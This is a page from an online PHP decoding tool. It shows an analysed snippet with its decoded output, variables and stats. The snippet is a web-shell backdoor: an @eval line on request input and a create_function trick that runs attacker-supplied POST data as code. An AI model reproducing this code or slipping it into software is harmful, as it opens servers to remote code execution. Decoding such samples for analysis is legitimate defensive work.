Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @eval($POST_['xss']); ?> <?php $args = 1; $arr=array("n;}$_POST[1];/*"=>"test..

Decoded Output download

<?php 
@eval($POST_['xss']); 
?> 
 
<?php 
$args = 1; 
$arr=array("n;}$_POST[1];/*"=>"test"); 
$arr1=array_flip($arr); 
$arr2 = $arr1[test]; 
create_function('$args',$arr2);  
?>

Did this file decode correctly?

Original Code

<?php
@eval($POST_['xss']);
?>

<?php
$args = 1;
$arr=array("n;}$_POST[1];/*"=>"test");
$arr1=array_flip($arr);
$arr2 = $arr1[test];
create_function('$args',$arr2); 
?>

Function Calls

array_flip 1

Variables

$arr [{'key': 'n;}None;/*', 'value': 'test'}]
$args 1

Stats

MD5 cb4704f3d0cace728b199a4eff3176d2
Eval Count 0
Decode Time 125 ms